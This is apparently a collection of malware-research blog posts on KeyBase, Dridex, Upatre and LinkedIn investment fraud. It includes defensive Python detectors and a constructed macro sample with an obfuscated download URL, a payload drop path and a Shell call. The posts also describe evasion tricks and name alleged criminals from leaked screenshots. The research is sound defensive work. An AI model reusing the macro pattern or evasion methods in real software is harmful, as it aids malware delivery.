Please add me to your #Linkedin sockpuppet network!

LinkedIn has approximately 414m active users, a proportion of which are completely fake. This practice has been observed in the past, with fake recruiters targeting researchers.

This content is the result of the same 'gang' of Nigerian criminals who favour KeyBase to steal sensitive credentials. I've observed these gangs (along with @techhelplist, who finds a lot of the details included here) using LinkedIn as a new platform to attempt financial fraud.

A large number of the screenshots shared with me are the result of a misconfigured KeyBase panel: there is a well-known bug in KeyBase which allows unauthenticated access to the /images/ directory to anyone who knows how to locate it. Palo Alto have listed a large number here.

A number of determined sock puppets are using LinkedIn as a means of defrauding a significant number of businesses in the following countries:

  • UAE
  • US
  • UK

The figures are derived from the companies targeted in the panel images.

The sectors targeted include Real Estate, Investment & Law. This kind of fraud is complex in the sense that it requires geographically dispersed criminals to 'link up' in order to succeed. The fraud is highly likely committed from Nigeria (thanks to @techhelplist again, who helped ID the content and the fraud gang). The concept is simple: offering investment or seeking investment, depending on the potential victim.

The belief that this fraudulent operation is run from Nigeria rests on the evidence provided; this included active Facebook content and helpful photographs of places of work and of friends associated with the gang.

The image below is taken from a panel and shows our 'guy' logged into a LinkedIn profile, with a large number of messages all carrying the same content.

Seeking investment or offering investment.

@malwarehunterteam do a great job of supplying a large number of samples of various malware. iSpy came to my attention recently, and its codebase is almost identical to KeyBase, with both employing the same stealing functions. I will post a more detailed article on iSpy when I get time.

Reconnaissance message

We offer secured loans or funds to individuals and companies at low interest rates. We offer long and short term loans or funding of any projects. Our firm has recorded a lot of breakthroughs in the provision of first-class financial services to our clients.
— Akeem

The message above is fairly static and appears to be sent to a large number of potential victims. The method of communication varies across email providers. If you believe you've been approached by this gang, or have been part of the attempted fraud process, please contact me; I can share a number of verified IOCs.

The image below is a capture from the /images/ directory which includes a conversation with the 'master', who shares the devices used to perform the initial reconnaissance. Pg.5 of this alludes to the hierarchy involved.

In summary, this pattern of attempted fraud via social networks should make the message clear: nobody is who you believe they are, particularly when dealing with financial transactions.

FireEye produced a research article on the thriving economy of 'scammers' operating out of Nigeria. Pg.11 is of interest in the context of the content here.

The scammers use a variety of tools for distributing these exploits and keyloggers, such as email extractors, email notifiers, bulk mailing providers, and VPN/proxy providers. The email extractors help scammers scrape email addresses of potential targets from various sites which are fed to bulk mailing applications. They use proxy providers as a precaution when logging into their victims' accounts to hide their IP addresses. They also use email notifiers to monitor incoming emails.
— https://www2.fireeye.com/rs/848-DID-242/images/rpt_nigerian-scammers.pdf

Trust, but verify is a mantra that I preach. It's disappointing that LinkedIn does not have any method of formal verification for its users. There is no PGP or Keybase.io input required; even most DNMs require some form of ID verification!

@thegrugq makes the point far more eloquently than I ever could. In short, the game of cyber security has changed, and the context in which you operate, or call your working environment, is someone else's lunch.

Full slides here

'only crime on this host'

There are some interesting aspects to research. One is being able to understand and analyse how criminals operate. Another is seeing how other researchers operate.

Recently there have been a number of incidents involving what has been described as 'white hackers'; I don't have a term which sufficiently describes the work other than 'interesting'.

Who IS the Batman?

Last month, I noted that someone had replaced the malicious content usually delivered by Dridex with Avira and a 'calling card'. The calling card gave information on the content of the compromised server, and intelligence which I believe was intended to identify the original owner, or the original compromiser, of the site.

I've again been collating the intel behind this person, or team, who are quickly compromising hosts after they have already been compromised, and listing the details relating to the original compromise.

Following up to now? Good!

Legit site --> compromised --> compromised again, with details posted to identify the original actor.

Recently, a compromised site, hxxp://www.wakeupforpeace.org.au/crimeware-server-readme.txt (Freezepage link: http://www.freezepage.com/1456771380KTQSEGLOJB), has been 'done' by what could be the same actors/team previously observed in the Dridex 'incident'. I may well be wrong, but the details are strikingly similar.

The site itself is a simple phisher, looking for PayPal/banking credentials, and some really bad PHP handles the theft.

If anything, this should teach you:

  1. Do not use your own name for the email address you're going to use to receive the proceeds of crime.
  2. Do not log into your phishing site from your residential address.
  3. Also, do not include your personal email address in the POST body of an HTTP request.

Thanks again to https://twitter.com/Techhelplistcom/

#KeyBase reloaded

KeyBase first came to my attention in mid 2015, as a favoured tool of those with little technical capability, otherwise known as 'skidz'. I first wrote about it in July 2015, noting some of its basic capabilities here: http://www.brycampbell.co.uk/new-blog/2015/7/14/keybase-malware

Palo Alto have recently produced excellent research, together with IOCs, which goes into great detail; you should read it: http://researchcenter.paloaltonetworks.com/2016/02/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/

In essence it steals sensitive credentials; some of the PHP used to steal the data is shown in the screenshot.

A lot of thanks should go to the great work that @malwarehunterteam, @James_MHT and @Techhelplist are doing to promote the discovery and takedown of these panels. I have privately, and legally, observed some of the content that is being stolen by the criminals, and it is extremely sensitive material.

Welcome to KeyBase

KeyBase, as mentioned, is an infostealer, and the Palo Alto write-up discusses its capabilities in much greater detail than I will.

KeyBase arrives via spoofed mails, often disguised as Office documents or using double extensions; here is an example.

Cynomix relationship values

Hash & sample available here, courtesy of Invincea.

So, the research and analysis went on, and the content became richer. Researchers in certain circles are acutely aware of a known bug in KeyBase, and further bugs make the stolen information even less secure; this is highlighted in the Palo Alto article, and all information was obtained legally.

The comical aspect which prompted this post is the fact that KeyBase itself is not advanced. It is very noisy and does not encrypt data in its network communications, so perimeter security can detect its patterns as it attempts to exfiltrate sensitive information, as demonstrated by the image above with 'Window title' visible in the packet.

The panels themselves are usually not configured correctly; they are almost 'plug and play', and this is confirmed by the research done by Palo Alto. The screenshots below are all taken from a panel which was completely unsecured and available to view on the open web.

We quickly discovered that the 'miscreants' behind these panels had infected themselves; the reason for this became clear. The screenshots were interesting, including Facebook profiles and messages between the gangs.

So, critically: you'll note I have not obscured any content. Joseph Ikems: we've extracted content which was captured from his own panel, or from the friend with whom he's discussing the 'problems with the panel'.

However, it's probably more likely that it was jeffjeff, as the panel was named closely to this in terms of domain registration. The reasons for this are shown in part by the content below.

We have email. So, we've managed to obtain, or should I say he has given us, his email. The above screenshot shows the miscreant logged into a Yahoo mail account under the name 'dixion.tony'; let's assume it's [email protected]

The most advanced threat intelligence platform in the world agrees: this is potentially our guy. He has history, and people are complaining about being scammed.

This began to get interesting as the exposed screenshots yielded more information, this time as the criminals began to actively target industries, setting up fake domains and fake businesses in an attempt to extort legitimate businesses once they had been compromised.

A tab open: 'Textile companies turkey'

The spam campaigns had been crafted to appear to come from a fake company, 'Jinatrading LLC', as shown below.

Jinatrading LLC

Looks to be having some 'issues'.

Website content

As the content became more peculiar, so did the screenshots captured from the panel. At one point Tony decided to log into Facebook.

Ehhh..Tony!

The total number of screenshots from Tony's own machines exceeds 90, and the total number of screenshots is over 200. Attempting to alert the victims sadly proved fruitless; a lot of them never responded.

The lessons learned, and not published here, are that the criminals behind this enterprise persistently infected themselves with their own stealer and failed to understand the technology they worked with. The details here are approximately 20% of what was extracted, including fake company registrations intended to appear legitimate.

An aggressive financial motive was clear, and some element of muling was involved. The screenshots below show searches for how to clear money or 'cash out'.

How do i hide my stolen money breh?

Detailed IOCs are available upon request; some of the artefacts are searchable by hash and are listed on VT.


#Dridex gets an upgrade [Update]

Proofpoint and Phishme.com both confirm new developments

Since the beginning of the year Dridex has returned with a number of new features:

  • New botnet IDs targeting Germany
  • New persistence methods, including writing to startup folders at shutdown
  • Increased CPU usage when executing (!)
  • AV targeting and debugger checks

A few samples I've analysed over the past few weeks have exhibited new capabilities, at least in terms of the delivery method and 'on disk' activity. 'Macroseses', as they are referred to in the current campaign, still prompt the user to enable macros, and still use an AutoOpen mechanism to extract and run. The current delivery chain is as follows:

MWI > Doc > Macro > JavaScript > download a .jpg over HTTP > extract the binary > execute it from %appdata%

The developers appear to be experimenting with new capabilities; the malware I've observed recently appears to be using some rudimentary steganography.
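The page does not say how the binary is hidden inside the downloaded .jpg, so the following added check (my example, not Dridex code or a tool from the post) assumes the simplest form, raw bytes appended after the JPEG end-of-image marker. It walks the JPEG segment structure rather than searching for the first FF D9, so an EXIF thumbnail's own end marker does not fool it, and it reports whether the trailing bytes carry a PE header. The sample image and PE-shaped stub are constructed inline.

```python
import struct

# Dridex's current delivery chain fetches a ".jpg" and extracts a binary from it.
# The page does not document how the binary is hidden; this check ASSUMES the
# simplest form, raw bytes appended after the JPEG end-of-image marker.

def jpeg_end_offset(data):
    """Walk the JPEG segment structure and return the offset just past EOI (FF D9).

    Returns None if the data does not parse as a JPEG. Walking segments instead of
    searching for the first FF D9 avoids stopping at an EXIF thumbnail's own EOI.
    """
    if not data.startswith(b"\xff\xd8"):
        return None
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return None
        marker = data[pos + 1]
        if marker == 0xD9:                                # EOI
            return pos + 2
        if marker == 0xFF:                                # fill byte
            pos += 1
            continue
        if 0xD0 <= marker <= 0xD7 or marker == 0x01:      # RSTn / TEM carry no length
            pos += 2
            continue
        if pos + 4 > len(data):
            return None
        seg_len = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pos += 2 + seg_len                                # marker + length-prefixed payload
        if marker == 0xDA:                                # SOS: skip entropy-coded data
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break                                 # a real marker, not FF00 / RSTn
                pos += 1
    return None

def find_appended_payload(data):
    """Describe bytes trailing the image, or return None if the file ends at EOI."""
    end = jpeg_end_offset(data)
    if end is None or end >= len(data):
        return None
    trailer = data[end:]
    kind = "unknown"
    if trailer[:2] == b"MZ" and len(trailer) >= 0x40:
        e_lfanew = struct.unpack_from("<I", trailer, 0x3C)[0]
        if trailer[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
            kind = "pe"
    return {"image_end": end, "trailer_len": len(trailer), "kind": kind, "trailer": trailer}

# --- constructed sample data (not taken from a real Dridex campaign) -----------

def build_clean_jpeg():
    """Minimal JPEG: APP0, an APP1 embedding a thumbnail with its own FF D9, SOS, EOI."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    app1 = b"\xff\xe1" + struct.pack(">H", 12) + b"Exif\x00\x00" + b"\xff\xd8\xff\xd9"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\xff\x00\x34\x56"                        # FF 00 is a stuffed byte, not a marker
    return b"\xff\xd8" + app0 + app1 + sos + scan + b"\xff\xd9"

def build_sample_with_pe():
    """The clean JPEG followed by a minimal PE-shaped stub (MZ, e_lfanew -> 'PE\\0\\0')."""
    stub = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 20
    return build_clean_jpeg() + stub

if __name__ == "__main__":
    print(find_appended_payload(build_clean_jpeg()))       # None: nothing after EOI
    result = find_appended_payload(build_sample_with_pe())
    print(result["kind"], result["image_end"], result["trailer_len"])   # pe 51 88
```

A naive `data.find(b"\xff\xd9")` on the constructed image would stop at the thumbnail's marker (offset 32) and report the rest of the genuine image as a "payload"; the segment walk returns the true end at offset 51.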

Along with payload development, the content is gaining some active anti-reversing tricks, using debugger checks which stop execution if a debugger is detected; I have not personally observed these being used by Dridex this year.

Dridex is actively looking to avoid detection and will exit the process if it detects a debugger attached to it. Further advances to the payload include antivirus checks, which in this particular payload included checks for the Comodo Security suite.

I also observed some odd behaviour in relation to what is being described by mainstream media as 'white hat' activity. One payload was benign and delivered Avira Antivirus in the way I described above.

Some of the compromised sites hosting the Avira payload had what appeared to be a calling card left as a warning, with cryptic messages relating to the 'owner' (or 'pwner?') of the host.

The final observation is the worrying set of strings associated with the detection of virtualisation.

Observed API calls

  • Lower 163bcc30 BusVMware
  • GetSystemTimeAsFileTime
  • GetProcessHeap
  • MountPointManager
  • FindResourceA
  • GetTickCount
  • Sleep
  • GetStartupInfoA
  • TerminateProcess
  • UnhandledExceptionFilter
  • IsDebuggerPresent
  • LockResource
  • FindWindowExA
  • FindWindowA
  • RegOpenKeyExW
  • OpenProcessToken
  • GetUserNameW

#Dridex New year New tricks

Nope, it doesn't use 'DNS changing', as mentioned by some this week. Maybe a little confusion with the webinjects.

It has, however, changed slightly in terms of persistence: it now copies the loader into the startup folder.

Squarespace spoof campaigns

I recently received a few well-disguised emails pretending to be from my hosting company, Squarespace. It seems like simple credential harvesting; there were no payloads on the sites.

Fake

Interestingly, I have received two in the past week, one a lot more professional than the previous.

Second mail


List of sites used.

I'm interested to hear from anyone who has received similar mails.

Windows essential logging guides

Windows logging is absolutely critical, and the brilliant work from dfir-blog.com shows in great detail how to fine-tune it.

  • Use this - http://dfir-blog.com/2015/10/11/protecting-windows-networks-essential-logging/
  • In conjunction with this - https://static1.squarespace.com/static/552092d5e4b0661088167e5c/t/56016bffe4b0a6f05d1832ab/1442933759511/Windows+Logging+Cheat+Sheet_Sept_2015.pdf

Thanks to dfir-blog.com & MalwareArchaeology.com

#Dridex and the new Botnet ID


#Upatre & 'RSA encrypted' documents

Upatre has an identity crisis, it thinks it's an RSA encrypted document.

RSA?

Arriving in the form of a seemingly 'signed' RSA document branded with the RSA logo, this very clever change of tactic from the team behind the Upatre/Dyre campaigns attempts to use something that would probably fool even the most observant of people.

The junk displayed isn't an RSA key; it's just part of a macro, which is part of the TTP associated with this particular campaign. Whilst it's not a new style, it's certainly very clever.

The strings are visible, with the fake key shown here.

The Dyre/Upatre combination has been used and abused by the same threat actors for some time. This change of tactic, moving on from regular spam such as invoices and remittance advice to something which makes a genuine attempt at obscuring its payload, shows the constant development that Upatre is undergoing.

Here are some of the proxies in use by the botnet


@techhelplist has been doing some work on identifying these routers and has a tracker on his site.

Also, Proofpoint have identified this change.


The morals associated with hacking & breaches

Hacking, by definition, is as follows (thanks to Wikipedia):

In the computer security context, a hacker is someone who seeks and exploits weaknesses in a computer system or computer network. Hackers may be motivated by a multitude of reasons, such as profit, protest, challenge, enjoyment
— https://en.wikipedia.org/wiki/Hacker_(computer_security)

HackingTeam had some questionable ethics in relation to its business practices and had long been pursued by those who sought to confirm this, one such being Christopher Soghoian, who has relentlessly used his ability to raise the profile of the issue for the benefit of those being exploited by the likes of Hacking Team, VUPEN & Gamma.

The Gamma breach could be argued to be the start of the identification of known 'corporate enemies', particularly those who provide EaaS, or Exploitation as a Service.

The interesting aspect of the Gamma breach was that it was not met with a fanfare of expectation; whereas Lizard Squad, Anonymous & LulzSec indirectly looked to gain notoriety with their actions, the only thing that shaped opinion on Gamma was their business dealings.

Soghoian commented in his PhD thesis on the approach that has become routine practice:

Assisting Big Brother has become a routine part of business, albeit one that some service providers would probably rather do without

Whilst the argument over government surveillance is a long one, and now a more popular discussion amongst those who were none the wiser prior to the hacks, leaks and breaches, it does indicate that it is in the public interest to at least have a mandate for these discussions.

HackingTeam had been on the radar of privacy advocates for some time, and its dealings with oppressive regimes had been highlighted numerous times. The claim was vindicated once HT had been breached and the data appeared online, with numerous conversations with those regimes confirmed.

https://twitter.com/ClausHoumann/status/649487453502488577/photo/1

The distinction between breaches and hacks probably needs to be made clearer. If the motivation of a hacker is left to the conclusion of the victim, it's always going to be malicious. If a company chooses to sell 0day exploits in order to enable genocide, then it's a hack; the opposite can be said if a company chooses to portray a political leader in a comical light, thereby offending a nation. That's a breach.

Enemies are listed here, very helpfully, in order to form an opinion.

  • Gamma International - Hacked
  • HackingTeam - Hacked
  • BlueCoat
  • Trovicor
  • AmeSys

Questionable business practices lead to breaches; questionable moral practices lead to hacks.

Honey, i shrunk the profits.

Updated 05/09/15 with screenshot from @conradlongmore

A business is only as strong as the capabilities that protect it, not only in a strategic or governance sense but in a practical capacity.

Ubiquiti had $46m siphoned out of their accounts by way of a phishing email. This was disclosed in their SEC filings, and it demonstrates the level of losses a business faces as a result of phishing.

I spend a lot of my time tracking phishing campaigns and the associated botnets that make money, real money, from the fraudulent transactions that occur as a result of phishing campaigns. Often, mail campaigns arrive in the tens of thousands to unsuspecting recipients, and that threat is growing.

  • Do you have the capacity to receive unsolicited emails from spammers? Does your hardware capacity planning include daily spam campaigns?
  • Do you, as a spoofed sender, have the ability to take hundreds of disgruntled phone calls (see below from @Conradlongmore) and unparalleled traffic to your site from people wondering why 'you' are sending emails asking for payment, or whatever SE technique is being used to deliver the mails?
  • Are your customers and employees familiar with the disclosure of losses and third-party information that may result from one of your employees opening a phishing email?
  • Can you cope financially with the fraudulent transactions that may occur as a result of these campaigns?

If you're unable to answer all of these questions with a firm 'Yes', I would be greatly concerned about identifying the areas in which your business is exposed. If you have any capability for processing or receiving payments, then the risk of being phished is as great as ever.

$46m, think about that figure and consider if in relative terms you can afford that level of losses.

#Dridex doesn't appreciate your research

This time it is targeting researchers using Tor for anonymous research. I don't think it's in the interests of these actors to destroy victims' drives unless they are a target; it's an assumption that only those using Tor to inspect Dridex campaigns are being targeted.

I noticed, when analysing a recent sample on Windows XP, that it destroyed the MBR, and this seems to tally with Lexsi's research and the comments on Malekai's forum.

With its significant growth into Europe, Spain & France particularly being affected, this menace proves its capabilities with a sting in its tail.

Dridex code analysis

Keybase Malware

I have recently analysed a sample of what appears to be a newer version of KeyBase.

Delivered as an executable inside a zip, the malware has the usual keylogging capabilities of most trojans, utilising native API calls to hook keyboard input and using HTTP to upload images of the desktop. In this instance the victims' data is being uploaded to a server which isn't as tightly managed as usual.

Here is the web panel:

Panel

Here are the uploaded screenshots, appended with date and times.

Uploads

Here are some screenshots of applications in use on the victims machines.

Skype

Someone about to do some online banking; the malware will capture keystrokes as well as taking screenshots.

Banking

Someone placing an order for some materials via Outlook.com

Materials

We can see, encoded in the HTTP stream, specific keywords including 'notepad' (which I launched) and the keystrokes, included in the request to the C&C that uploads the screenshots.

Traffic
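Because KeyBase posts its stolen data over plaintext HTTP (the 'Window title' in the packet earlier, the keystrokes in the C&C request here), a proxy log or IDS can flag the pattern. The following is an added example of that check, my own code rather than anything from the post or from Palo Alto's research; the request lines, host, paths and parameter names are constructed assumptions, not fields taken from a real sample.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed proxy-log style request lines (not captured from a real panel).
# The host, paths and parameter names are ASSUMPTIONS made for this example.
SAMPLE_REQUESTS = [
    "GET http://panel.example.invalid/post.php?type=keystrokes&machinename=WIN7-PC"
    "&time=2016-02-26%2023:48:45&text=notepad%20hello%20world HTTP/1.1",
    "GET http://panel.example.invalid/post.php?type=screenshot&machinename=WIN7-PC"
    "&time=2016-02-26%2023:49:00&windowtitle=Untitled%20-%20Notepad HTTP/1.1",
    "GET http://www.example.invalid/index.html HTTP/1.1",
    "GET https://mail.example.invalid/?search=Window%20title HTTP/1.1",
]

# Vocabulary that, seen together in one plaintext query string, looks like a
# stealer posting keystrokes or screenshot metadata. Tune this against your own
# captures; these names are assumptions, not the malware's documented fields.
STEALER_PARAMS = {"type", "machinename", "windowtitle", "text", "time", "iden"}
STEALER_TYPES = {"keystrokes", "screenshot", "clipboard", "passwords"}
WINDOW_TITLE_RE = re.compile(r"window\s*title", re.IGNORECASE)

def parse_request_line(line):
    """Split 'METHOD absolute-URL HTTP/x.y' into (method, url); None if malformed."""
    parts = line.split()
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    return parts[0], parts[1]

def inspect_request(line):
    """Return the reasons one request looks like plaintext infostealer exfiltration."""
    parsed = parse_request_line(line)
    if parsed is None:
        return []
    _method, url = parsed
    parts = urlsplit(url)
    # Only plaintext HTTP exposes the query string to a passive sensor; that
    # visibility is exactly what makes KeyBase 'noisy'. TLS traffic is skipped.
    if parts.scheme != "http":
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    overlap = sorted({name.lower() for name in params} & STEALER_PARAMS)
    if len(overlap) >= 3:
        reasons.append("stealer-style parameter set: " + ", ".join(overlap))
    for name, values in params.items():
        for value in values:
            if value.lower() in STEALER_TYPES:
                reasons.append(f"{name}={value} labels a stolen-data type")
            if "windowtitle" in name.lower() or WINDOW_TITLE_RE.search(value):
                reasons.append(f"window title carried in parameter {name}")
    return reasons

def scan(lines):
    """Map 1-based line numbers of suspicious requests to their reasons."""
    findings = {}
    for number, line in enumerate(lines, 1):
        reasons = inspect_request(line)
        if reasons:
            findings[number] = reasons
    return findings

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_REQUESTS).items():
        print(f"line {number}:")
        for reason in reasons:
            print("   ", reason)
```

Lines 1 and 2 of the sample are flagged (keystroke upload and screenshot metadata respectively); the ordinary page fetch is clean, and the HTTPS request is skipped because its query string would not be visible on the wire.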

#Dridex leverages known CVEs

Recent analysis of a Dridex sample shows evidence of two hard-coded references to CVEs below the elevation code for .sdb abuse.

Internal code references to two known RCE vulnerabilities in Windows.

Probably another method of bypassing UAC, now that Microsoft has patched the .sdb abuse method first noticed in February and noted by CERT-JP.

Update : Compromised AirOS Routers being used by #Dyre

Updated to include comments from Ubiquiti.

Dyre/Dyreza has gotten some attention this week in relation to targeting banks. After tracking Dridex and other associated banking trojans, I've researched parts of the command and control infrastructure that is abused by Dyre/Dyreza.

Dridex uses compromised sites for payload delivery, Upatre & Emotet do similar things, Dyre/Dyreza are using compromised routers.

The Dyre/Dyreza samples I analysed, upon infection, seek to communicate with a lot of compromised AirOS routers within the botnet.

Dyre

AirOS is not the only platform affected by Dyre/Dyreza.

RouterOS (MikroTik)

Recently, I recall reading on Krebs' blog that Lizard Squad's DDoS platform ran via backdoors on compromised routers. Whether this vector uses brute-forcing of potentially weak usernames and passwords in the same way Lizard Squad did, or a backdoor that ships with the routers for firmware upgrades, remains to be seen.

Update 8/7/15

Comments from Brian Krebs here

Ubiquiti gave the following statement:

We did disable remote management by default, and took a lot of flack from our users, so we reverted it.

You should inform the ISP about this router, so they can contact the user.
— http://community.ubnt.com/t5/Installation-Troubleshooting/Attack-Malware/m-p/1289182#M83622

Admitting it previously shipped with remote management disabled, and then enabling it as a result of feedback, seems strange. The threat it poses far outweighs the benefits of enabling it.

#Dridex reaches full SSL capability

Dridex today reached full SSL capability for its communication with the 'supernodes'. A few samples analysed today showed pure SSL connectivity to peer nodes in the botnet. This was something I feared was evolving, considering the active checking for modern sandbox analysis; it gives Dridex the ability to hide in SSL traffic, and the threat posed by this is threefold:

  1. SSL traffic is a legal, and political minefield, SSL interception even more.
  2. Companies at risk of spam campaigns are obligated to identify and mitigate the traffic, giving credence to the risk it poses, yet research can't be done without intercepting SSL traffic.
  3. Smaller companies who do not possess the financial, legal or technical abilities to intercept SSL traffic will not be able to cope with the already advanced threat.

Dridex campaigns are also spreading further into the EU, with CERT-FR today posting an alert in relation to the campaigns actively targeting France.

Dridex botnets 220, 125 & 120 are now the number one risk posed to businesses that use email as a means of communication; the success rates and high turnover of IP infrastructure associated with Dridex make it clear that it's a successful tool for criminals.

Whilst everything is being done to monitor backdoors, these threats are coming in through the front door.


#Dridex & Anti Virtualisation detection

Dridex seems to be the most prevalent form of malware targeting businesses. Since the turn of the year I've thrown some numbers around about how Dridex is:

  • Targeting the UK retail & finance industry
  • Evolving to use PowerShell (platform dependent)
  • Using rudimentary encryption (ROT13) to attempt to avoid analysis

A newer twist to Dridex is the attempt to circumvent some commercial virtualisation. Here is a snippet from one of the samples freely available on Malwr.com or via the excellent hybrid-analysis.com.

I could see that once the sample was detonated it would drop files in %temp%, and in those temp files are the configuration details for the sample currently detonating; it is explicitly attempting to detonate only on 'tin', for lack of a better phrase. Didier had encountered this sample and came to the same conclusion as me.

I prefer to inspect the malicious word document via python scripts than to detonate it in a sandbox.

I again refer to the excellent BotConf I attended in December, and the talk from Paul Jung discussing sandbox detection.

When inspecting the malicious documents I highly recommend http://www.decalage.info/ and the olevba.py scripts, which can not only dump the macro and decode base64 strings, but will also prettify the content into tables for 'reporting'.
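As a complement to dumping the macro with olevba, the following added example (my own code, not olevba's decoding or anything from the post) peels the two obfuscation layers the page mentions, base64 and ROT13, off the string literals in a VBA dump, accepting a layer only when the result looks like a URL, a drop path or an executable. The macro fragment, host and path are constructed for the example.

```python
import base64
import codecs
import re

# Constructed VBA fragment in the style of a Dridex AutoOpen macro; the
# obfuscated strings, host and path are ASSUMPTIONS made for this example.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim u As String
    u = "uggc://rknzcyr.vainyvq/vzntr.wct"
    Dim p As String
    p = "JUFQUERBVEElXHVwZGF0ZS5leGU="
    Dim greeting As String
    greeting = "Hello"
    Shell p
End Sub
'''

# VBA doubles a quote to embed one inside a string literal.
STRING_LITERAL_RE = re.compile(r'"((?:[^"]|"")*)"')
# What a decoded layer must look like before we believe it: URL, drop path, executable.
INTERESTING_RE = re.compile(
    r"(https?://|%appdata%|%temp%|\\|\.exe\b|cmd\.exe|powershell)", re.IGNORECASE)
BASE64_RE = re.compile(r"[A-Za-z0-9+/]+=*")

def try_base64(text):
    """Decode text as base64 if it is well-formed and yields printable ASCII, else None."""
    if len(text) < 8 or len(text) % 4 or not BASE64_RE.fullmatch(text):
        return None
    try:
        decoded = base64.b64decode(text, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded.isprintable() else None

def peel(literal, max_depth=4):
    """Strip base64 / ROT13 layers until the string looks interesting; returns (text, layers)."""
    current, layers = literal, []
    for _ in range(max_depth):
        if INTERESTING_RE.search(current):
            break
        decoded = try_base64(current)
        if decoded is not None:
            current, layers = decoded, layers + ["base64"]
            continue
        rotated = codecs.decode(current, "rot_13")
        # ROT13 always "succeeds", so accept it only when its output is itself
        # meaningful: an interesting string, or a base64 blob for the next pass.
        if INTERESTING_RE.search(rotated) or try_base64(rotated) is not None:
            current, layers = rotated, layers + ["rot13"]
            continue
        break
    return current, layers

def scan_macro(vba_source):
    """Return [(literal, decoded, layers)] for every string literal that needed decoding."""
    results = []
    for match in STRING_LITERAL_RE.finditer(vba_source):
        literal = match.group(1).replace('""', '"')
        decoded, layers = peel(literal)
        if layers:
            results.append((literal, decoded, layers))
    return results

if __name__ == "__main__":
    for literal, decoded, layers in scan_macro(SAMPLE_MACRO):
        print(f"{literal!r} -> {decoded!r} via {' > '.join(layers)}")
```

The plain "Hello" literal is left alone because neither decoding step produces anything that passes the interest check, which keeps the output to the strings worth reporting.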